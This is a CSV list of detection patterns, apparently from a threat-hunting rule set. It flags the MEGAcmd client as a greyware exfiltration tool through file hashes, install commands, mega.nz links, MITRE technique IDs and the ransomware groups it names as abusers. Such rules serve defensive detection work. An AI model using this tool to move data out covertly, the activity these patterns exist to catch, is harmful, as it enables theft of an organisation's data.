"*b9c52c18fb7f1b046650f606aa2904b18b73108bc9fde5000a7953a294169532*",".{0,1000}b9c52c18fb7f1b046650f606aa2904b18b73108bc9fde5000a7953a294169532.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*baf01944477c9b110f7f0edf02e4c129e63e78d4a3e87db667e9b6bb2d8aeaad*",".{0,1000}baf01944477c9b110f7f0edf02e4c129e63e78d4a3e87db667e9b6bb2d8aeaad.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*bea14bb7e2fa975cdb9d73a326b3d4e7fdd0176774279e83e072641b8a8bfdfd*",".{0,1000}bea14bb7e2fa975cdb9d73a326b3d4e7fdd0176774279e83e072641b8a8bfdfd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*c0f2a8d4c63349b7e3a5a34bae4a0994152c49bb4ee200ee4705b5599eef1b31*",".{0,1000}c0f2a8d4c63349b7e3a5a34bae4a0994152c49bb4ee200ee4705b5599eef1b31.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*c175bb05f516d617d49d4b0032f71265bf95c7e62c334ee16c0f3c3f87dbbe77*",".{0,1000}c175bb05f516d617d49d4b0032f71265bf95c7e62c334ee16c0f3c3f87dbbe77.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*c185b75ecfe16724160530bedfe237537b23e3dc2ec2f38869fa6698bf12ce74*",".{0,1000}c185b75ecfe16724160530bedfe237537b23e3dc2ec2f38869fa6698bf12ce74.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*c39719e5e79043b28a6368cdc942032bf5b2ab18fff2f66bd726058e9e921ef7*",".{0,1000}c39719e5e79043b28a6368cdc942032bf5b2ab18fff2f66bd726058e9e921ef7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*c6f2a4b09f9249c4e77ad03cc0e15940f080c125187137bc88a7d2adf2a4916f*",".{0,1000}c6f2a4b09f9249c4e77ad03cc0e15940f080c125187137bc88a7d2adf2a4916f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*caed90cc51561edd29eb5e842c266add1bb477261cf5254a0e2c218ed0737b93*",".{0,1000}caed90cc51561edd29eb5e842c266add1bb477261cf5254a0e2c218ed0737b93.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*cb984e4a89d00bb86a40eab7f7920e2bb739e3eb69a35596586f45e06619961f*",".{0,1000}cb984e4a89d00bb86a40eab7f7920e2bb739e3eb69a35596586f45e06619961f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*cfcdba9a1f3f660957120a8096f37fba92e92e89a24a18c916130ab459cfcf73*",".{0,1000}cfcdba9a1f3f660957120a8096f37fba92e92e89a24a18c916130ab459cfcf73.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*d3b331e8568b4aa59710b2a731541d625138fa0d37aa26fda679a6b8713827ad*",".{0,1000}d3b331e8568b4aa59710b2a731541d625138fa0d37aa26fda679a6b8713827ad.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*d42e64cfcb227a43ebd33e91b8bf5f49c8095f588477a9400d1107aab52b84f4*",".{0,1000}d42e64cfcb227a43ebd33e91b8bf5f49c8095f588477a9400d1107aab52b84f4.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*d57684855baf42e911b235c7ffb5a106aac875461d5faeb059c4d941e7b5cfd6*",".{0,1000}d57684855baf42e911b235c7ffb5a106aac875461d5faeb059c4d941e7b5cfd6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*d692deb721e9ac81db35e26542abbc64f26aebb0f232dab53d390de7a03461da*",".{0,1000}d692deb721e9ac81db35e26542abbc64f26aebb0f232dab53d390de7a03461da.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*d9b6a53b78a6ac70f165ebebd6ebea9de40da7b200a92d576ac3d687a27e158e*",".{0,1000}d9b6a53b78a6ac70f165ebebd6ebea9de40da7b200a92d576ac3d687a27e158e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*dc0cea82985d2d307bfe4f5bd44736410c481b1d6070bac185b90bf1b53a7e5c*",".{0,1000}dc0cea82985d2d307bfe4f5bd44736410c481b1d6070bac185b90bf1b53a7e5c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*dec4ee8bffdeb1c87164239a4104760f440b6399fefc897edd37f7094ebeb87c*",".{0,1000}dec4ee8bffdeb1c87164239a4104760f440b6399fefc897edd37f7094ebeb87c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*df39fd5831826cb988eb5bfdfb4a98ca75eda8c03f6acdc286a7741448849c9b*",".{0,1000}df39fd5831826cb988eb5bfdfb4a98ca75eda8c03f6acdc286a7741448849c9b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*df52291409a56fd512402124a94b51dda27c0b5caf2c93d36932e6ce2268bb3c*",".{0,1000}df52291409a56fd512402124a94b51dda27c0b5caf2c93d36932e6ce2268bb3c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*dnf install *megacmd*",".{0,1000}dnf\sinstall\s.{0,1000}megacmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*e45eeac40ace7b050f9747d79954c4b7bb82792b727a691799694f109938b338*",".{0,1000}e45eeac40ace7b050f9747d79954c4b7bb82792b727a691799694f109938b338.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*e5d799f4ebb0f0a02c6c7efb0fd946a9a9f7b8283c5ccb697132974711060ccf*",".{0,1000}e5d799f4ebb0f0a02c6c7efb0fd946a9a9f7b8283c5ccb697132974711060ccf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*e7ed5baca1c5f53c18e8d01bdb0e4d0f78b82bc72cb3afedac54a8ef8209ca34*",".{0,1000}e7ed5baca1c5f53c18e8d01bdb0e4d0f78b82bc72cb3afedac54a8ef8209ca34.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*eb1290f3e5914a7805f2767885b743705ac1526774f32f82ee14d899b0b43374*",".{0,1000}eb1290f3e5914a7805f2767885b743705ac1526774f32f82ee14d899b0b43374.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*eb58f70f2f5fb48cab8eb1127276b9a52bed2ba60e56f168ba3dc69d71d5f736*",".{0,1000}eb58f70f2f5fb48cab8eb1127276b9a52bed2ba60e56f168ba3dc69d71d5f736.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*ec616fea07e36749e5846b97eebe23138c7012699155f8a2cbd9c6c3e0b8bfca*",".{0,1000}ec616fea07e36749e5846b97eebe23138c7012699155f8a2cbd9c6c3e0b8bfca.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*f47d36b9cf879546d44f0efd0fe2e4c1fcd75a13f4d7eb3fb8e40296a1f333b2*",".{0,1000}f47d36b9cf879546d44f0efd0fe2e4c1fcd75a13f4d7eb3fb8e40296a1f333b2.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*f4f31a262a9a63438734a81d89462898a082278a49a41bed2f39792a6b3dbcc5*",".{0,1000}f4f31a262a9a63438734a81d89462898a082278a49a41bed2f39792a6b3dbcc5.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*f5793c201602a3619cac14d31d0356d058d8128b13027b1e64073dd029193614*",".{0,1000}f5793c201602a3619cac14d31d0356d058d8128b13027b1e64073dd029193614.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*f5cc9ce16100354271c7b385377053076c486cba84f21151a65721d24caecf09*",".{0,1000}f5cc9ce16100354271c7b385377053076c486cba84f21151a65721d24caecf09.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*f64064f35b2c464cb20fdcb70a8aa73856b6a8af65acd5be8d58b79df9889c1c*",".{0,1000}f64064f35b2c464cb20fdcb70a8aa73856b6a8af65acd5be8d58b79df9889c1c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*f830d20d4677677a10833cee5fbfa7717d8b2d90a5ddc1fc0153426aa7267ec0*",".{0,1000}f830d20d4677677a10833cee5fbfa7717d8b2d90a5ddc1fc0153426aa7267ec0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*fbb81f40c843fc33e57a23db01ee0f206c99c6ed75520a5594e0b3d525725215*",".{0,1000}fbb81f40c843fc33e57a23db01ee0f206c99c6ed75520a5594e0b3d525725215.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*ff9d4086614006d6372ab2ac9d750701157e40285452aba802460da8f91c404f*",".{0,1000}ff9d4086614006d6372ab2ac9d750701157e40285452aba802460da8f91c404f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*from megacmd_tests_common import *",".{0,1000}from\smegacmd_tests_common\simport\s.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*https://mega.io/cmd#download*",".{0,1000}https\:\/\/mega\.io\/cmd\#download.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*https://mega.nz/folder/8L80QKyL#glRTp6Zc0gppwp03IG03tA*",".{0,1000}https\:\/\/mega\.nz\/folder\/8L80QKyL\#glRTp6Zc0gppwp03IG03tA.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application 
to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*https://mega.nz/folder/bxomFKwL#3V1dUJFzL98t1GqXX29IXg*",".{0,1000}https\:\/\/mega\.nz\/folder\/bxomFKwL\#3V1dUJFzL98t1GqXX29IXg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*https://mega.nz/folder/D0w0nYiY#egvjqP5R-anbBdsJg8QRVg*",".{0,1000}https\:\/\/mega\.nz\/folder\/D0w0nYiY\#egvjqP5R\-anbBdsJg8QRVg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*https://mega.nz/folder/gflVFLhC#6neMkeJrt4dWboRTc1NLUg*",".{0,1000}https\:\/\/mega\.nz\/folder\/gflVFLhC\#6neMkeJrt4dWboRTc1NLUg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - 
Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*https://mega.nz/linux/repo/*.deb*",".{0,1000}https\:\/\/mega\.nz\/linux\/repo\/.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*killall mega-cmd*",".{0,1000}killall\smega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*killall mega-cmd-server*",".{0,1000}killall\smega\-cmd\-server.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
